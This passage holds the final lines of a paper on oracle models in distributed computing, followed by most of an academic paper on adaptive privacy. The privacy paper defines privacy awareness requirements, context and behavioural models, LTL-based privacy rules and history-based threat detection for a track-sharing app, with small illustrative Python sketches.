oracle construction not only reflects the design of many current implementations, but will help designers in choosing the oracle they want to implement with a clear semantics and the inherent trade-offs in mind.
Future work will focus on several open issues, such as the solvability of Eventual Prefix in message-passing, the synchronization power of other oracle models, and fairness properties for oracles. a) Acknowledgments: The authors thank the referees for their helpful comments. REFERENCES
Engineering Adaptive Privacy: On the Role of Privacy Awareness Requirements

Inah Omoronyia¹, Luca Cavallaro², Mazeiar Salehie², Liliana Pasquale³, Bashar Nuseibeh²,³

¹School of Computing, University of Glasgow, UK
²Lero – The Irish Software Engineering Research Centre, University of Limerick, Ireland
³Department of Computing, The Open University, UK

inh.omoronyia@glasgow.ac.uk, {luca.cavallaro, mazeiar.salehie, liliana.pasquale, bashar.nuseibeh}@lero.ie

Abstract—Applications that continuously gather and disclose personal information about users are increasingly common. While disclosing this information may be essential for these applications to function, it may also raise privacy concerns. Partly, this is due to frequently changing context that introduces new privacy threats and makes it difficult to continuously satisfy privacy requirements. To address this problem, applications may need to adapt in order to manage changing privacy concerns. We thus propose a framework that exploits the notion of privacy awareness requirements to identify runtime privacy properties to satisfy. These properties are used to support disclosure decision making by applications. Our evaluations suggest that applications that fail to satisfy privacy awareness requirements cannot regulate users’ information disclosure. We also observe that the satisfaction of privacy awareness requirements is useful to users aiming to minimise exposure to privacy threats, and to users aiming to maximise functional benefits amidst increasing threat severity.

Index Terms—Privacy, utility, selective disclosure, adaptation

I. INTRODUCTION

Consumers and enterprises increasingly rely on mobile and ubiquitous applications, such as smart phones, to satisfy their social and business needs. This new generation of applications enables users to form localised, short- and long-lived groups or communities to achieve common objectives.
These applications may need to gather and disclose users’ sensitive information such as location, time, proximity to nearby services, and connectivity to other users. The exposure of such information in an unregulated way can threaten user privacy [1]. This calls for a more systematic approach to considering the privacy requirements of users in software applications. A representative class of such requirements is selective disclosure: deciding what information to disclose, in which context, and the degree of control an individual has over disclosed information [3]. A key determinant of selective disclosure is frequently changing context, e.g., changing time, location and group properties. These changes blur the boundary between public and personal spaces and may introduce unforeseen privacy threats [2]. Additionally, users may be unaware of when and for what purpose sensitive information about them is being collected, analysed or transmitted. This makes it even more difficult for users and applications to adapt in order to continue satisfying their privacy requirements. In this paper, we present an adaptive privacy framework that aims to support the selective disclosure of personal information in software applications. We follow the popular MAPE (Monitor, Analyse, Plan and Execute) loop [8] for designing adaptive applications. Our framework consists of models, techniques and tools, and focuses on the role of privacy awareness requirements (PAR), which embody three concerns: (i) the identification of what attributes to monitor in order to detect privacy threats; (ii) the discovery of such threats before personal information is disclosed; and (iii) a utility measure for the severity of discovered threats, as well as for the benefit that can be derived if the associated information is disclosed.
We suggest and demonstrate that an advantage of this approach is that decisions on whether or not to disclose information can be made based on reliable knowledge of both its cost and benefit to the user of the application. Our approach relies on software behavioural and context models, and on the privacy requirements of users, to identify attributes to monitor in order to discover a privacy threat. A privacy threat is discovered by searching the history of system interactions that may affect the satisfaction of a user’s privacy requirements. The severity of an identified threat and the associated benefit of disclosure are determined by analysing the evolving properties of the networks emerging from users’ interactions. Subsequently, we investigate the relevance of such a utility measure during the planning phase of software adaptation. Our approach for identifying monitored attributes has been implemented in an openly accessible automated environment [4]. In this paper, we evaluated our framework using a comparative study to examine the consequences of the satisfaction or failure of PAR during the planning phase of adaptive privacy. First, we showed that applications that fail to satisfy PAR are unable to manage privacy based on the utility of disclosure. Second, we showed that applications that satisfy PAR are able to regulate the disclosure of information with changing context. The remainder of the paper is organised as follows. Section II presents related work on privacy awareness and adaptation relevant to our overall approach, which is then presented in Section III. Section IV describes the models that we use in our approach. Section V then presents PAR and the associated mechanisms used to derive monitoring and utility measures for adaptive privacy. Section VI focuses on the experimental evaluation of our approach. Conclusions and further work are presented in Section VII. II.
RELATED WORK

The core contribution of our research is to show that capturing privacy awareness requirements in software systems can be used to better engineer adaptive privacy. In this section, we review related work in the areas of adaptive privacy, privacy engineering and privacy awareness upon which we build our approach. A related notion of awareness requirements was described by Souza et al. [5] as a class of requirements that predicate the satisfaction of other requirements. Albeit not focused on privacy, the approach has been used [7] to specify the need for adaptation of software systems. In this paper we tailor the notion of awareness requirements and propose the use of PAR for adaptive privacy. Adaptive privacy was introduced by Schaub et al. [9] as a system's ability to preserve privacy in the presence of context changes, by providing recommendations to the user or via automatic reconfiguration. This reconfiguration is essential since the boundary delimiting a user's decision to disclose or withhold information changes with context [10]. Braghin et al. [11] used the concept of ambients to enforce privacy in a changing environment; this was achieved by using policies to define the boundaries of information disclosure. Braghin et al. did not consider that changes in context may determine the need to change the attributes that are monitored in the application, nor did they consider the notion of utility. Privacy engineering was described by Spiekermann and Cranor [6] as a systematic effort to embed privacy concerns into the design of an application. Following this principle, Kalloniatis et al. [12] proposed a methodology to build privacy-preserving applications. Similarly, Liu et al. [13] proposed a requirement-driven development methodology for secure and privacy-preserving applications based on the i* framework. Barth et al. [14] used the contextual integrity framework as a means to design privacy-preserving applications.
Contextual integrity features a context model and a formal model that uses temporal logic to define the communication between two entities and how the disclosure of information takes place. These methodologies and frameworks do not consider that a system can adapt during its lifetime and that, consequently, the constructs for satisfying privacy requirements can also change. Finally, Pötzsch [15] defines privacy awareness as an individual's cognition of who, when, which, what amount, and how personal information about his/her activity is processed and utilised. Pötzsch's view of privacy awareness helps to provide a set of constructs for building a context in which adaptive privacy can be assessed. An empirical study of the impact of this view of privacy awareness has been carried out [16]. However, privacy awareness constructs have not been investigated in adaptive privacy. We suggest that privacy awareness is critical to enable users and systems to gain sufficient knowledge about how to act in privacy-sensitive situations. Once assured that their privacy is broadly preserved, and aware of the expected benefit of disclosure, users may consider forfeiting some privacy when engaging in certain interactions.

III. OVERALL APPROACH AND MOTIVATING EXAMPLE

The objective of adaptive privacy is to enable applications to detect privacy threats with changing context, and subsequently to carry out adaptation actions that ameliorate the consequences of the threat. Our approach to achieving this is based on the rationale that for useful adaptation to occur in software systems, there needs to be monitoring, analysis, planning and execution [8]. These activities enable software systems to detect changes in the context at runtime and to react to them appropriately. As shown in Figure 1, we propose that adaptive privacy firstly mandates that systems should be able to identify attributes to monitor in order to detect privacy threats (monitoring).
Secondly, when privacy threats are discovered, systems should have an understanding of the consequence of the threat (analysis). It is the ability of systems to satisfy their monitoring and analysis needs that we characterise as PAR. The satisfaction of these requirements serves as a useful input into the system's ability to make informed decisions on information disclosure (planning). Finally, based on the disclosure decision, mitigation actions can be carried out to ameliorate the consequence of the threat (execution). Such mitigation actions can involve updating the behaviour of the system, changing the context of operations, or users carrying out explicit mediation actions. In this paper, we focus on the first three phases of the MAPE loop to highlight the PAR for making useful disclosure decisions. Specifically, PAR are the requirements that need to be satisfied by a system in order to meaningfully adapt the privacy of its users as context changes. In this research, we demonstrate that the core of such requirements includes: the ability of systems to identify attributes to monitor in order to detect privacy threats; the discovery of a privacy threat before information about a user is disclosed; and the severity of the threat as well as the benefit of information disclosure amidst the discovered threat. In this paper, we first highlight the models useful for satisfying PAR (Section IV), and we then present an approach to PAR analysis based on these models (Section V).

![Figure 1 Adaptive privacy framework](image)

Finally, we present an evaluation of the usefulness of PAR at the planning phase of adaptive privacy (Section VI). We achieve our objective using an example involving a track-sharing application for running and other outdoor activities. Examples of such applications include B.iCycle (http://b-icycle.com), MyTracks (mytracks.appspot.com), etc.
Typically, such applications enable a group of users to share live GPS tracks and performance statistics with fellow users and other agents such as their fitness instructors and physicians. For this example, privacy management includes the capability of users to decide the limits of information disclosure to other users – about their current location, distance, age, heart rate, burned calories, weight loss, etc. Effective adaptive privacy requires users sharing their outdoor activity experience to understand information flows, weigh the consequences of sharing information, and make informed, context-specific decisions to disclose or withhold information.

IV. MODELS FOR SATISFYING PAR

As shown in Figure 1, the three main models we use to enable the satisfaction of privacy awareness requirements are a behavioural model, a context model, and a model representing user privacy requirements. We discuss each of these models in detail.

A. Context Model

A context model is useful for identifying the interactions that can occur between users, as well as the attributes of the users involved in achieving a common objective [17]. For adaptive privacy, context models represent the attributes that are subsequently manipulated by the software system in order to support the activity of the users as they interact with one another. An advantage of context models is their reusability across the design of multiple systems. In this research, we formally define a context model as a tuple \( CM = (D, Y, U, R, C) \), where: \( D \) is a set of attributes; \( Y \) is a set of entities; \( U \) is a relation \( U: Y \times Y \) representing the association between entities; \( R \) is a relation \( R: D \times 2^D \) between attributes, where \( 2^D \) is the power set of \( D \); and \( C \) is a relation \( C: Y \times 2^D \) that associates entities to attributes. An instance of the context model for the case study in Section III.B is shown in Figure 2.
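A toy encoding of the tuple \( CM = (D, Y, U, R, C) \) may clarify the definition. The concrete sets below are illustrative fragments of the track-sharing example, under the assumption that each inference rule maps a deducible attribute to the set of attributes it can be inferred from:

```python
# Illustrative fragment of the context model CM = (D, Y, U, R, C).
D = {"LocCords", "Trajectory", "LocName", "AveSpeed", "TrackName",
     "StartTime", "Height", "Weight", "BMI"}              # attributes
Y = {"Subject", "Sender", "Receiver", "Location", "Track"} # entities
U = {("Subject", "Receiver"), ("Track", "Location")}       # associations
# R: attribute -> set of disclosed attributes it can be inferred from.
R = {"LocCords": {"AveSpeed", "TrackName", "StartTime"},
     "BMI": {"Height", "Weight"}}
# C: entity -> attributes that describe it.
C = {"Location": {"LocCords", "Trajectory", "LocName"}}

def inferable(disclosed):
    """Close a set of disclosed attributes under the inference rules R."""
    known = set(disclosed)
    changed = True
    while changed:
        changed = False
        for target, premises in R.items():
            if target not in known and premises <= known:
                known.add(target)
                changed = True
    return known
```

For example, `inferable({"AveSpeed", "TrackName", "StartTime"})` contains `LocCords`, while disclosing `Height` alone does not make `BMI` inferable.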
An entity in our model represents an object that can be described by a set of attributes. Attributes here are viewed as atomic variables that cannot be further decomposed. There are two kinds of entities: entities that characterise the environment of interaction (e.g. the Location entity, represented in light boxes in Figure 2), and entities representing the roles of users in the system. As shown in the shaded boxes in Figure 2, we represent the set of users as agents. These agents interact to exchange information (attributes about an agent) with other agents. The agent responsible for sending the information is referred to as the Sender, while the receiving agent is the Receiver. The agent characterised by the sent information is the Subject. The interactions that occur between agents with a given role are modelled by the relation \( U \). This relation also expresses how other entities relate to each other (e.g. Track and Location) or how agents relate to other entities (e.g. Subject and ActivityType). Attributes can relate to each other as modelled by the inference relation \( R \). Such inference relations are established rules that enable the deduction of a previously unknown attribute from other disclosed attributes [17]. For example, the rule \( \text{LocCords} = \text{AveSpeed} \cup \text{TrackName} \cup \text{StartTime} \) expresses that the location coordinates of a user can be inferred from the disclosure of the user's average speed, track name and start time. Another example is the rule \( \text{BMI} = \text{Height} \cup \text{Weight} \). Finally, an entity is related to a set of attributes as expressed by the relation \( C \). An example in Figure 2 is the relation between the entity Location and the attributes LocCords, Trajectory, and LocName. Generally, our approach to modelling context is amenable to other forms of inference based on transitive, Euclidean or symmetric relations.

B.
Behavioural Model

A behavioural model represents the different states that an agent can reach, and the transitions required to enter each state. Formally, a behavioural model is a tuple \( B = (S, E, t) \), where \( S \) is a set of states and \( E \) is a set of events, an event being defined by the tuple \( (D^n \mid y,\ a_s,\ \{\text{sent} \mid \text{received}\}) \). In that tuple, \( D^n \) is a set of cardinality \( n \) containing the attributes manipulated by the transition; the set \( D^n \) can be replaced by an entity \( y \) that characterises the environment of interaction. The subject \( a_s \) identifies the agent the event refers to (i.e. an agent with type Subject), and \( \{\text{sent} \mid \text{received}\} \) expresses whether the attributes are sent or received by the agent. Finally, \( t \) is the state transition relation \( t: S \times (E \cup \{\varepsilon\}) \rightarrow S \). The occurrence of a transition with an \( \varepsilon \)-event (\( \varepsilon \)-transition) means that the agent whose behaviour is described does not send or receive any attribute in that transition. An example of a behavioural model, represented as a Labelled Transition System (LTS), is shown in Figure 3. In Table 1, we illustrate the set of context attributes and the events associated with each transition of the LTS in Figure 3. For example, the transition \( t_4 \) in Table 1, from state 3 to 4 in Figure 3, is triggered by the event shareRaceResult. The attributes used by the event are shown in the right column of the table. These attributes are associated with the agent \( a_1 \), which in our example is the subject. Finally, the event features the \( \text{sent} \) keyword, indicating that \( t_4 \) sends the attributes in the event. Table 1 also features some \( \varepsilon \)-transitions, signified by \( \rightarrow \varepsilon \). Note also that there can be transitions not associated with any context attributes (e.g. \( t_8 \)).
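The LTS of Figure 3 can be encoded as a transition table. The sketch below is a simplified, partial encoding: states and attribute sets follow Table 1, while the helper `run` is an illustrative addition, not part of the formal model:

```python
# Partial encoding of the behavioural model B1 (Figure 3 / Table 1).
# States are strings "0".."5"; an event is (name, attrs, subject, dir),
# where dir is "sent", "received" or EPS for an epsilon-transition.
EPS = "eps"

transitions = {
    ("0", ("establishGPSFix",
           frozenset({"LocCords", "StartTime", "ActivityType"}),
           "a1", EPS)): "1",
    ("1", ("recordTrack",
           frozenset({"CurrentTime", "AveSpeed", "LocCords"}),
           "a1", EPS)): "2",
    ("2", ("uploadTrack",
           frozenset({"AveSpeed", "TrackName", "LocCords",
                      "StartTime", "EndTime"}), "a1", EPS)): "3",
    ("3", ("shareRaceResult",
           frozenset({"AveSpeed", "TrackName", "LocCords",
                      "StartTime", "EndTime", "Weight"}),
           "a1", "sent")): "4",
    ("4", ("sharePersonalInfo",
           frozenset({"Gender", "Height", "Age"}), "a1", "sent")): "5",
}

def run(start, event_names):
    """Replay a sequence of event names and return the reached state."""
    state = start
    for name in event_names:
        succ = [s2 for (s1, ev), s2 in transitions.items()
                if s1 == state and ev[0] == name]
        if not succ:
            raise ValueError(f"no transition {name!r} from state {state}")
        state = succ[0]
    return state
```

For instance, `run("0", ["establishGPSFix", "recordTrack", "uploadTrack", "shareRaceResult"])` reaches state 4, mirroring the example built around \( t_4 \).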
For detecting privacy threats we focus only on the information that the various agents in the system may exchange. Consequently, we consider \( t_1, t_2, t_3 \) and \( t_8 \) as \( \varepsilon \)-transitions, since they do not send or receive any attribute.

![Figure 3 A behavioural model B1](image)

**Table 1 Attributes associated with state transitions (t)**

<table>
<thead>
<tr>
<th>( t_i )</th>
<th>Event</th>
</tr>
</thead>
<tbody>
<tr><td>( t_1 )</td><td>establishGPSFix {LocCords, StartTime, ActivityType} ( \rightarrow \varepsilon )</td></tr>
<tr><td>( t_2 )</td><td>recordTrack {CurrentTime, AveSpeed, LocCords} ( \rightarrow \varepsilon )</td></tr>
<tr><td>( t_3 )</td><td>uploadTrack {AveSpeed, TrackName, LocCords, StartTime, EndTime} ( \rightarrow \varepsilon )</td></tr>
<tr><td>( t_4 )</td><td>shareRaceResult {AveSpeed, TrackName, LocCords, StartTime, EndTime, Weight}, ( a_1 ), sent</td></tr>
<tr><td>( t_5 )</td><td>sharePersonalInfo {Gender, Height, Age}, ( a_1 ), sent</td></tr>
<tr><td>( t_6 )</td><td>requestUserTrack {SubjectName}, ( a_1 ), sent</td></tr>
<tr><td>( t_7 )</td><td>viewUserTrack {AveSpeed, TrackName, StartTime, EndTime, LocCords, Weight, Height, Gender, Age}, ( a_1 ), sent</td></tr>
<tr><td>( t_8 )</td><td>hibernate {} ( \rightarrow \varepsilon )</td></tr>
</tbody>
</table>

**C. User Privacy Requirements**

User privacy requirements are individual expressions by agents to regulate the manner of information disclosure about their activity. We view the possible failure of a privacy requirement in a specific context as a privacy threat that triggers appropriate mitigation actions (see Section V.B). We build on the view presented in [10], where the privacy of a subject is conditioned by the subject's (and other agents') past experiences and expectations of the future.
In this way, we assume that privacy requirements are expressed as IF-THEN rules. The IF segment contains an event and the identity of its Sender or Receiver: if the event is a sent event, then a Receiver of the event is identified; alternatively, if the event is a received event, then a Sender of the event is identified. The THEN part is a linear temporal logic (LTL) formula that captures the past experiences or future expectations of a subject by using past and future operators [18]. The LTL formula predicates about the values that attributes of the context model can assume, or about the knowledge that can be gained by agents about a subject over time [19][20]. The formula \( K_{a_i}d_{a_j} \) is a modal representation of knowledge [20] expressing that the agent \( a_i \) knows the value of the attribute \( d \) about a subject \( a_j \). Examples of privacy requirements for the selective disclosure of a subject's information can be stated as follows:

**(PR1)** IF Location, \( a_1 \), received, \( a_2 \) THEN \( \Diamond_p\ \text{StartTime}_{a_1} < 21.00\ hours \).

**(PR2)** IF Weight, \( a_1 \), sent, Receiver THEN \( \Box \neg K_{\text{Receiver}} \text{BMI}_{a_1} \).

The symbols \( \Diamond_p \) and \( \Box \) are the LTL operators eventually in the past and globally, respectively, as defined in Table 2. \( PR_1 \) is active if \( a_2 \) sends a specific Location attribute about the agent \( a_1 \). In that case, the subject should have started his race before 21.00 hours at least once in the past. Similarly, if \( PR_2 \) is active, i.e. the Weight of \( a_1 \) is received by any Receiver, then \( \neg K_{\text{Receiver}} \text{BMI}_{a_1} \) (i.e. the Receiver does not know the BMI of \( a_1 \)) should hold globally (i.e. both in the past and in the future).

**V. ANALYSING PAR**

In this section, we describe the different analyses used for the satisfaction of PAR, based on the models described in Section IV.

**A.
Identifying Attributes to Monitor**

For the satisfaction of PAR we first need to identify the attributes to monitor for the detection of privacy threats. We realise this by identifying the subset of attributes that are common to the context and behavioural models and to the privacy requirement of the user. The identification process is composed of four steps:

1. For each privacy requirement \( PR_n \), a couple \( (d_x, a_i) \) or \( (y_x, a_i) \) present in the event of the IF segment is collected in a set \( M \), where \( d_x \) and \( y_x \) identify an attribute or an entity referenced by the event in the IF part of \( PR_n \), and \( a_i \) is the subject of the event.

2. For each couple \( (y_x, a_i) \) in \( M \), the tuples \( c_{dx} \) contained in the relation \( C \) of the context model and featuring \( y_x \) are selected. For each such tuple \( c_{dx} \), a new couple \( (d_x, a_i) \) is added to \( M \), where \( d_x \) is an attribute in \( c_{dx} \). Finally, the couple \( (y_x, a_i) \) is removed from \( M \).

3. For each couple \( (d_x, a_i) \) in \( M \), the tuples \( r_{dx} \) contained in the relation \( R \) of the context model and featuring \( d_x \) are selected. For each such tuple \( r_{dx} \), a new couple \( (d_x, a_i) \) is added to \( M \), where \( d_x \) is an attribute in \( r_{dx} \). Note that each \( d_x \) can also be part of other tuples in the relation \( R \); in this case the step is repeated for those tuples.

4. Finally, for each couple \( (d_x, a_i) \) in \( M \), the behavioural model of the agent \( a_i \) is considered. The transitions in the transition relation \( t \) of \( a_i \) that are triggered by events associated with \( d_x \) are selected and associated to \( PR_n \).

The output of these steps consists of the monitored attributes contained in the set \( M \), and the marked transitions in the behavioural model of an agent that operate on monitored attributes.
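Under the simplifying assumption that each tuple of \( R \) maps an inferable attribute to the attributes it can be deduced from, the four steps can be sketched as follows; the relations and the transition table are illustrative fragments of the running example:

```python
# Illustrative fragments of the context relations and of Table 1.
C = {"Location": {"LocCords", "Trajectory", "LocName"}}
R = {"LocCords": {"AveSpeed", "TrackName", "StartTime"}}
transitions = {  # transition id -> attributes used by its event
    "t4": {"AveSpeed", "TrackName", "LocCords",
           "StartTime", "EndTime", "Weight"},
    "t5": {"Gender", "Height", "Age"},
    "t7": {"AveSpeed", "TrackName", "StartTime", "EndTime",
           "LocCords", "Weight", "Height", "Gender", "Age"},
}

def monitored_attributes(event_ref, subject):
    # Step 1: seed M with the couple taken from the IF part of PR_n.
    M = {(event_ref, subject)}
    # Step 2: expand entity couples into attribute couples via C.
    for (x, a) in set(M):
        if x in C:
            M.remove((x, a))
            M |= {(d, a) for d in C[x]}
    # Step 3: close M under the inference relation R.
    changed = True
    while changed:
        changed = False
        for (d, a) in set(M):
            for premise in R.get(d, ()):
                if (premise, a) not in M:
                    M.add((premise, a))
                    changed = True
    # Step 4: mark transitions whose events use a monitored attribute.
    marked = {t for t, attrs in transitions.items()
              if attrs & {d for d, _ in M}}
    return M, marked
```

For PR1 this yields the couples for LocCords, Trajectory, LocName, AveSpeed, TrackName and StartTime, and marks the transitions of Table 1 whose events contain any of them.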
These marked transitions identify where specifically in the behaviour of an agent the monitoring needs to occur. Considering PR1 in Section IV.C, the IF part of the requirement contains the event \((Location, a_1, \text{received})\). The first step adds the couple \((Location, a_1)\) to the set \(M\). The second step considers those tuples in the relation \(C\) of the context model that include the \(Location\) entity. As shown in Figure 2, these tuples are \((Location, LocCords), (Location, Trajectory)\) and \((Location, LocName)\). The couples \((LocCords, a_1), (Trajectory, a_1)\) and \((LocName, a_1)\) are then added to \(M\). The third step considers the relation \(R\) in the context model and looks for attributes already in \(M\) that are also contained in a tuple in \(R\). For instance, as highlighted in Section IV.A, the \(LocCords\) attribute is included in the tuple \((LocCords, AveSpeed, TrackName, StartTime)\) of the relation \(R\). Thus, the couples \((AveSpeed, a_1), (TrackName, a_1)\) and \((StartTime, a_1)\) are added to \(M\). The final step considers the transitions of the agent \(a_1\) as shown in Table 1. The transitions \(t_4\) and \(t_7\) are marked since their events contain the attributes \(TrackName\), \(LocCords\) and \(StartTime\).

B. Privacy Threats Detection

Privacy threat detection is aimed at discovering whether an interaction between agents can result in the failure of a privacy requirement. We define an interaction as the exchange of information about a subject between a sender and a receiver. Given the set of monitored attributes and the associated transitions in agent behaviours, our approach analyses the interaction history of the system. The outcome ascertains the satisfaction or failure of a given privacy requirement at a given moment in the system's history. In this subsection, we first characterise an interaction between two agents, and then describe how a sequence of such interactions can be used to define a history of the system.
Finally, we demonstrate the detection of privacy threats based on the defined history.

1) Characterising an interaction between two agents: An interaction is a single information flow between two agents \(a_1\) and \(a_2\). Formally, such a flow is defined as either of the following: i) a couple \((t_i, t_j)\), where \(t_i\) is a transition \((s_i, (\{d_{i,1}, d_{i,2}, ..., d_{i,n}\}, a_s, \text{sent}), s_j)\) belonging to the transition function of \(a_1\), and \(t_j\) is a transition \((s_a, (\{d_{a,1}, d_{a,2}, ..., d_{a,n}\}, a_s, \text{received}), s_b)\) belonging to the transition function of \(a_2\); or ii) two couples \((t_i, a_1), (t_j, a_2)\). The latter represents interactions where an agent sends information that is eventually received by a receiver in the system. We have assumed asynchronous interaction; it is possible that synchronous interaction can yield different behavioural runs and knowledge models. For example, assume that in a system there exists an agent \(a_1\) whose behavioural model is represented by \(B_1\) in Figure 3, and a second agent \(a_2\) whose behavioural model \(B_2\) is presented in Figure 4. The transition \(t_4\) in \(B_2\) is identical to the transition \(t_4\) in \(B_1\), and the transition \(t_{4Rec}\) features a received event with the same attributes as the event in \(t_4\). Assuming the events in \(B_2\) and in \(B_3\) have the subject \(a_1\) (i.e., \(a_1\) is sending information about itself to \(a_2\)), the interaction between \(a_1\) and \(a_2\) is the tuple \((t_{4,a_1}; t_{4Rec,a_2})\).

2) Defining the history of the system: A history of a system is a sequence of information flows between agents in the system. The history keeps track, at each time instant, of the predicates holding in that instant and of the values of the context attributes describing each subject. Formally, a history is defined as \(H = h_1, h_2, ..., h_n\).
Each \(h_i\), \(i \in [1, n]\), is a history step described by the sets \((\sigma, \nu, \pi)\), where \(\sigma = \{s_{a_1}, ..., s_{a_m}\}\) contains the states of the agents in the system in that history step, \(\nu\) contains the values of the context attributes for each agent, and \(\pi\) contains the predicates that hold in \(h_i\). In \(H\), the transition from \(h_i\) to \(h_{i+1}\) signifies an interaction between two agents in the system. That interaction changes the states of the agents involved in the transition and can modify the predicates holding in the arrival state. Consider the partial history of a system involving interactions between a group of agents \(a_1\), \(a_2\) and \(a_3\). An instance of that history is shown in Figure 5. The behaviour of \(a_1\), \(a_2\) and \(a_3\) is as described in \(B_1\), \(B_2\) and \(B_3\) of Figures 3 and 4 respectively. The behaviour of \(a_3\) features the transition \(t_{4Rec}\), which we assume identical to the one already introduced for \(a_2\), and the transition \(t_{5Rec}\), whose event has the same attributes as \(t_5\) in Table 1 but is a received event. In \(h_1\) of Figure 5, the agent \(a_1\) is in state \(B1(3)\) as a result of the uploadTrack event, while \(a_2\) and \(a_3\) are in idle states (i.e., \(B2(0)\) and \(B3(0)\) respectively). The interaction \((t_{4,a_1}; t_{4Rec,a_2})\), involving \(a_1\) disclosing its weight to \(a_2\), brings the history into \(h_2\). At this point, \(a_2\) knows the weight of \(a_1\) (i.e., \(K_{a_2}\text{Weight}_{a_1}\)), since \(a_1\) has sent that attribute in \(t_{4,a_1}\) and \(a_2\) has received it in \(t_{4Rec,a_2}\). At \(h_3\), \(a_2\) sends \(a_1\)'s Weight to \(a_3\) via the interaction \((t_{4,a_2}; t_{4Rec,a_3})\). Consequently, the knowledge model (what other agents know about \(a_1\)) consists of \(K_{a_2}\text{Weight}_{a_1}\) and \(K_{a_3}\text{Weight}_{a_1}\).

![Figure 4 Behavioural models B2 and B3](image)
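The accumulation of knowledge predicates along a history such as that of Figure 5 can be sketched as a replay over interaction tuples; the 4-tuple encoding of an interaction below is an illustrative simplification of the formal definition:

```python
# Replay a history of interactions, accumulating knowledge predicates
# K_receiver(attribute, subject). The 4-tuple interaction encoding is
# an illustrative simplification of the formal model.

def replay(history):
    """history: iterable of (sender, receiver, subject, attrs) tuples.
    Returns receiver -> set of (attribute, subject) pairs it knows."""
    knowledge = {}
    for sender, receiver, subject, attrs in history:
        known = knowledge.setdefault(receiver, set())
        known |= {(a, subject) for a in attrs}
    return knowledge

# h1 -> h2: a1 shares its race result (incl. Weight) with a2;
# h2 -> h3: a2 forwards a1's Weight to a3.
model = replay([("a1", "a2", "a1", {"Weight"}),
                ("a2", "a3", "a1", {"Weight"})])
```

After the second interaction, both \(a_2\) and \(a_3\) know the Weight of \(a_1\), matching the knowledge model of the example.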
![Figure 5 Example of a history of a system involving interactions between agents A1-A3, where A1 is the subject](image)

Finally, when the interaction \((t_{5,a_1}; t_{5Rec,a_3})\), involving \(a_1\) disclosing its height to \(a_3\), occurs, \(K_{a_3}\text{Height}_{a_1}\) holds.

3) Discovering privacy threats from a history of the system: Given a history and a privacy requirement, a privacy threat is detected if the LTL formula in the THEN segment of the privacy requirement is not verified in the history. Note that only privacy requirements whose IF segment matches the event associated with an incumbent interaction are considered. The verification of an LTL formula on a finite history has been introduced in the literature [18][24]. In this research, we extend the semantics defined in [24] to introduce a three-valued logic. The semantics of our logic is given in Table 2. We assume the formula \(F\) on \(H\) is evaluated at the current step of the history, denoted \(H, i\). The defined semantics has the following rationale: i) if the evaluation of a formula at the current instant \(i\) of the history offers enough evidence that the formula \(F\) will be true (respectively false) in all possible continuations of the history, then the formula is true (respectively false); ii) otherwise the evaluation of the formula is inconclusive, and the formula is unknown. If the formula evaluates to true, then the privacy requirement is verified and the analysis detects no threat; if the formula evaluates to false, then the privacy requirement is violated and the analysis consequently identifies a privacy threat. If the formula evaluates to unknown, our analysis signals a potential privacy threat. This means that there is not yet enough evidence to conclude that the privacy requirement is violated.
Such evidence can, however, be present in the following steps of the history. Consequently, our analysis derives a new instance of the formula, shifted one step into the future, and tries to verify the new instance in the next history step. Consider the history shown in Figure 5, and assume also that the agents in the network have interacted with other agents as demonstrated in Figure 6. Here, an undirected and unweighted network is assumed. In this network, nodes are agents, while a link between nodes is a relation formed between an information sender and a receiver. Specifically, we determine the benefit of disclosure based on the clustering coefficient of the generated network, while the severity of the threat is determined based on the degree centrality of the receiving agent. The clustering coefficient of an agent in a network is the ratio of the number of actual links between the agent's neighbours to the number of possible links between them. The overall clustering coefficient of the network is then the average of the clustering coefficients of the agents in the network. The clustering coefficient typically describes the concentration of the neighbourhood of an agent in the network. Such concentration has been used as an indicator of the extent to which an agent shares common properties and/or plays similar roles with other agents in the network [21]. For example, assume \(a_1\), \(a_2\) and \(a_3\) have interacted with other agents as demonstrated in Figure 6. The dotted link illustrates a scenario where the agent \(a_3\) is to disclose the attribute \(x\) to \(a_{R1}\) or \(a_{R2}\).
### Table 2 LTL semantics on the system history \(H\)

<table>
<thead>
<tr>
<th>Expression</th>
<th>Semantics</th>
</tr>
</thead>
<tbody>
<tr><td>(H, i \models F)</td><td>(F) holds at the step (i) of (H)</td></tr>
<tr><td>(H, i \models \text{LastTime } F)</td><td>(F) holds at the step (i-1) of (H)</td></tr>
<tr><td>(H, i \models \Diamond_p F)</td><td>True if (\exists\, 1 \leq j \leq i) such that (H, j \models F)</td></tr>
<tr><td>(H, i \models \Box_p F)</td><td>True if (\forall\, 1 \leq j \leq i), (H, j \models F)</td></tr>
<tr><td>(H, i \models \text{Next } F)</td><td>Unknown at (i); (H, i+1 \models F) is then evaluated</td></tr>
<tr><td>(H, i \models \Diamond F)</td><td>True if (H, i \models F); otherwise Unknown, and (H, i+1 \models \Diamond F) is evaluated</td></tr>
<tr><td>(H, i \models \Box F)</td><td>False if (H, i \not\models F); otherwise Unknown, and (H, i+1 \models \Box F) is evaluated</td></tr>
<tr><td>(H, i \models \neg F)</td><td>True if (H, i \not\models F); False if (H, i \models F)</td></tr>
</tbody>
</table>

Since \( \text{BMI} = \text{Height} \cup \text{Weight} \), for \(PR_2\) to be satisfied, \(\neg K_{\text{Receiver}} \text{Weight}_{a_1}\) or \(\neg K_{\text{Receiver}} \text{Height}_{a_1}\) should hold, where \(\text{Receiver}\) identifies a generic agent receiving the information. If we assume that the interaction \((t_{5,a_1}; t_{5Rec,a_3})\) has not yet occurred, the predicate \(K_{a_3}\text{Weight}_{a_1}\) holds at \(h_3\). The information contained in the history up to \(h_3\) is not sufficient to demonstrate that \(PR_2\) will not hold in all the possible continuations of \(H\), so our analysis marks it as unknown and signals a potential threat. The analysis will also continue to check the formula in the future, until further evidence can bring it to a conclusion. That evidence is provided in \(h_4\), where \(K_{a_3}\text{Height}_{a_1}\) holds.
In that step there is enough evidence to conclude that the condition does not hold in any possible continuation of \(H\), and the analysis will consequently signal a privacy threat.

---

### Figure 6

